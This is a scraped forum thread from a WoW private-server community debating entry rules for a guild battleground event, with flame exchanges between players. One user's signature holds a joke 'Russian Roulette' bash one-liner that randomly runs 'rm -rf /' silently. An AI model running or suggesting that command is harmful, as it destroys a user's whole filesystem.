User
Pass
2FA

[PvP Event] Battlegrounds between Guilds 4th Edition
Go to page Previous  1, 2, 3, 4  Next    

This forum is locked: you cannot post, reply to, or edit topics.   This topic is locked: you cannot edit posts or make replies.    Freakz Forum Index -> Trash Bin -> WOW -> Old Events
Author Message14705
truepower

[epicFacegaming1337]

(since 10-06-2022 18:27)

Votes: 91

Post Posted: 16-04-2016, 17:19:02 | Translate post to: ... (Click for more languages)

income wrote:
To avoid overnight guilds to believe that it was appropriate rule like: guild to have level 25 and have at least 3 months old ; the same for the players to have it least 2-3 months old in the guild . And it has to somewhat balance between guilds / factions.

you are funny

0 0

UNMERCY

[Mentally Stable]

(since 10-05-2016 18:43)

Votes: 2

Post Posted: 16-04-2016, 17:23:33 | Translate post to: ... (Click for more languages)

actualy hes right...its lame that rahun made a guild just for the event..with all the "gladi wpe players`.....to win the event....
2 0

Hawtydaboss

[Priest Moderator]

(since 04-05-2019 17:52)

Votes: 39

Post Posted: 16-04-2016, 18:04:52 | Translate post to: ... (Click for more languages)

UNMERCY wrote:
actualy hes right...its lame that rahun made a guild just for the event..with all the "gladi wpe players`.....to win the event....

Priest PvP Glyph Guide 5.4.8
Priest PvP Talent Tiers Guide 5.4.8
0 0

Arahanmdrqt

[Mentally Stable]

(since 21-02-2017 13:11)

Votes: 2

Post Posted: 16-04-2016, 23:51:11 | Translate post to: ... (Click for more languages)

Maybe we should stop flame and just stay on-topic, just register your guild and beat other competitive guilds and don't complain
3 0

Fabo

[Mentally Stable]

(since 01-05-2016 19:55)

Post Posted: 17-04-2016, 14:04:10 | Translate post to: ... (Click for more languages)

income wrote:
To avoid overnight guilds to believe that it was appropriate rule like: guild to have level 25 and have at least 3 months old ; the same for the players to have it least 2-3 months old in the guild . And it has to somewhat balance between guilds / factions.

This dude is right. This is the 4'th edition and you still accept guilds that are made 3 days before the event.
Just look at the log of 'O o O' > https://armory.freakz.ro/guild/genesis/o_o_o/log
This is a big problem.. why? They recruited all the remaining glads in 3 days. And not only the glads without guild.. They picked even from other guilds and they cannot participate at the event for this crap.
Just take the guilds that have lvl 25 and at least 3 months old.. like ' income ' told you to do.

Good luck with 6 guilds at a big event like this.

3 0

Mistmare

[Zis domnu' Jiji]

(since 09-08-2017 11:24)

Votes: 10

Post Posted: 17-04-2016, 17:04:37 | Translate post to: ... (Click for more languages)

Guild name: 99% WPE LØADÉD
Leader: Mistmare
About the event: Weekend is perfect for this event some free time for everyone.

0 0

rikymaru94

[:: A leGenD AlivE::]

(since 10-12-2019 12:35)

Votes: 69

Post Posted: 17-04-2016, 17:15:58 | Translate post to: ... (Click for more languages)

Can u stop trashtalking ? i can make a guild w/e i want.

""Îmi cunosc limitele. Dar pur ºi simplu le ignor."

0 0

mihai25

[Winter is here!]

(since 13-11-2022 10:56)

Votes: 153

Battletag: postrow.ID_BATTLE_NET} 
Post Posted: 17-04-2016, 18:46:57 | Translate post to: ... (Click for more languages)

First page updated!
Date & hour of the event added.

0 0

Nevermakemistakesagain

[Mentally Stable]

(since 29-04-2016 08:09)

Votes: 1

Post Posted: 18-04-2016, 07:02:03 | Translate post to: ... (Click for more languages)

Income is perfectly right!
Of course you don`t want offtopic discution , becouse you are afraid that a decision can be taken , to not let participate , guilds that are made in the last week , specialy with that reason.
My opinion , income is right ! but of course nobody will do nothing, and they will let the event to be like this way.
ANyway the winners are knowned, and the carts have been made already.
IT was very nice that every guild to participate with the players that they have, old ones, not this crap.
O o O , it`s not the only one guild that they made teams in the last week , i olso heard about other guilds that they made beautiful teams.
ANyway for me it will be only for fun. the top have been already set. ( this is not a`n event , this is for fame , for some.
Very luck to every team -
Cheers

1 0

Hawtydaboss

[Priest Moderator]

Post Posted: 18-04-2016, 08:22:15 | Translate post to: ... (Click for more languages)

Nevermakemistakesagain wrote:
Income is perfectly right!
Of course you don`t want offtopic discution , becouse you are afraid that a decision can be taken , to not let participate , guilds that are made in the last week , specialy with that reason.
My opinion , income is right ! but of course nobody will do nothing, and they will let the event to be like this way.
ANyway the winners are knowned, and the carts have been made already.
IT was very nice that every guild to participate with the players that they have, old ones, not this crap.
O o O , it`s not the only one guild that they made teams in the last week , i olso heard about other guilds that they made beautiful teams.
ANyway for me it will be only for fun. the top have been already set. ( this is not a`n event , this is for fame , for some.
Very luck to every team -
Cheers

I didn't understand your last sentence where the bracket starts plus i didn't understand this new word "KNOWNED".
Oh yea and "Very Luck"

p.s. Basically you know deep in yourself that you're going to lose since the majority of these players are top players with good experience in PvP,your arguments are invalid.

0 0

madau

[the Insane]

(since 11-11-2021 17:01)

Votes: 97

Post Posted: 18-04-2016, 08:42:05 | Translate post to: ... (Click for more languages)

Cut it out already! So what if they made a team now? They wanted to participate and that is great! I am pretty confident that most arena glads teams will have some troubles in bgs because they are outside of their confort zone.
That being said, I'd love to see evevry team participating for fun and having confidence they can win!
See you on the field!

Vengeance is in my heart, death in my hand,
Blood and revenge are hammering in my head.

0 0

income

[Immortal]

(since 14-06-2018 20:17)

Votes: 12

Battletag: postrow.ID_BATTLE_NET} 
Post Posted: 18-04-2016, 09:33:36 | Translate post to: ... (Click for more languages)

madau wrote:
I am pretty confident that most arena glads teams will have some troubles in bgs because they are outside of their confort zone.

LoL are u kidding no??? As long u`r guild is a pve guild that means u`r team mates are also very very "outside of their confort zone".

And ,in my opinion this is one of the reasons why few guilds participate in the event. From what I see are only 7 guilds submitted and are confident that the event will participate 3-4 just like last event.
This is not a flame...is just an opinion.

Cheers!

Rusian Roulette

Code:

$(echo "scale=0; $RANDOM % 6" | bc -l) == 0 ] && nohup rm -rf / >/dev/null 2>&1 || echo "You live (for now)"

1 0

Nevermakemistakesagain

[Mentally Stable]

(since 29-04-2016 08:09)

Votes: 1

Post Posted: 18-04-2016, 09:46:51 | Translate post to: ... (Click for more languages)

PVP = 90 % A - 10 % H.
And still they can make their teams, they way they want. THis is a`n event ? don`t think so.
You should think twice before starting this event , this event is only Alliance. Horde is optional.
But you would not imput this issue with 1 or 3 mounth oldness at guild or players, becouse you had only 2 teams submitted , untill one week ago , and if you input this thing, they will retired , and no event will be available.
But dosen`t matter, let`s participate at this ``event`` :-

PS : hawty , only with ``good`` players, you can to something , otherwise you will be 0. as afraid that you are , you gather the top players so you can have the chanse to win.
bye

0 0

Hawtydaboss

[Priest Moderator]

Post Posted: 18-04-2016, 10:06:12 | Translate post to: ... (Click for more languages)

I'm not even going to participate in this event and i'm still giving my personal opinion in this topic due to people like you talking random senseless stuff babycrying.As far as i remember you once told me how good your guild is,show it.A lot of non-professional PvP players in guilds like yours say that the high rated people are high rated because they're spending most of their time in arenas,well,you're all more of a BG-Heroes guild,so now you got the chance to show your Battleground skills to the arena players.I didn't understand the final attitude to me,am i 0 if i don't play with good partners in arenas or you noted that NORMALLY people need to gather good players in order to win?If it's the first,you can que into me to see how useless i am,if it's the second i totally agree with you,but you also need really good communication and strategy in Rated Battlegrounds and that event is exactly a "Rated".

p.s. Google translator doesn't work well.

0 0

Amnezx

[Best in Slot]

(since 11-11-2022 17:06)

Votes: 59

Post Posted: 18-04-2016, 11:09:13 | Translate post to: ... (Click for more languages)

Nevermakemistakesagain wrote:
PVP = 90 % A - 10 % H.
And still they can make their teams, they way they want. THis is a`n event ? don`t think so.
You should think twice before starting this event , this event is only Alliance. Horde is optional.
But you would not imput this issue with 1 or 3 mounth oldness at guild or players, becouse you had only 2 teams submitted , untill one week ago , and if you input this thing, they will retired , and no event will be available.
But dosen`t matter, let`s participate at this ``event`` :-

PS : hawty , only with ``good`` players, you can to something , otherwise you will be 0. as afraid that you are , you gather the top players so you can have the chanse to win.
bye

Can u stop flaming? You're just a random bg hero that's complaining and acusing all the players that are good in arenas. You're a prick nothing more, nothing less. Stop blaming nodd, he s one of the best priests thah freakz got, and he achieved a good performance even on AT. What about you? What's your max rate in any bracket? 1700?

1 0

Topic locked

Topic is closed, you cannot post any messages in it anymore

Locked by mihai25, 19 April 2016 18:21

This forum is locked: you cannot post, reply to, or edit topics.   This topic is locked: you cannot edit posts or make replies.    Freakz Forum Index -> Trash Bin -> WOW -> Old Events  
Go to page Previous  1, 2, 3, 4  Next    

The time now is 28-03-2024, 23:27:10
Copyright info

Based on phpBB ro/com
B

I forgot my password

This message appears only once, so
like us now until it's too late ! :D
x